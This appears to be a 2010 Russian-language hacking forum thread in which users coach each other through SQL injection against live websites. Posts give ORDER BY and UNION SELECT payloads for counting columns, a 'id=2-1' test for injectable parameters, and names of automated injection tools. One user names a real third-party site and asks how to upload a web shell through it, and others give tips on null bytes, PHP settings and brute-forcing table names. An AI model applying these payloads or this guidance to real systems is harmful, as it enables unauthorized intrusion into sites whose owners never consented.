30.05.2010, 16:15
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DrakonSerg
вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1
зы другой сайт
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 --
Если выведет 14, значит полей 13, и .т.п
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --
ponel?
|
|
|
29.05.2010, 14:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
news.php?id=1
news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть
|
|
|
|
29.05.2010, 14:29
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Сообщение от pinch
news.php?id=1
news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть
это точно? Выдается та же страница. Чем эту уязвимость можно крутонуть автоматически?
Вы звиняйте за нубские вопросы. Никогда как то не приходилось с sql плотно стыкаться.
|
|
|
|
29.05.2010, 14:33
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
1) содержимое страницы не должно изменяться (картинки соответственно).
2) sipt 4.0
pangolin
sqlhelper
toolza
|
|
|
|
29.05.2010, 15:28
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Код:
http://www.mustad.no/catalog/products.php?id=
Это PHP-инъекция? Можно ли как нибудь залить шелл? |
|
|
|
29.05.2010, 15:44
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
sqlihelper 2.7 выдал:
Mysql is version 4 please brute either tables or columns
Mysql is version 4 now bruting tables
я так понял нужно брутить названия колонок в таблице. Как? |
|
|
|
29.05.2010, 15:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
CyberHunter, да, это инклуд, но, скорее всего, файл для инклуда берется из поля БД, id которого - твой GET параметр.
DrakonSerg, да, надо брутить, т.к., судя по логам, ветка 4-я, в которой нету information_schema.
Последний раз редактировалось mailbrush; 29.05.2010 в 15:48..
|
|
|
|
29.05.2010, 16:01
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
mailbrush, т.е. вот так:
Код:
http://www.mustad.no/catalog/products.php?id=adress_gde_shell
но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.
|
|
|
|
29.05.2010, 16:19
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
Последний раз редактировалось pinch; 29.05.2010 в 16:23..
|
|
|
|
29.05.2010, 16:34
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от pinch
не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
А ничего, что там инклуда вообще нет? Что бы ни ставилии в id, в ошибке оно не инклудится
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
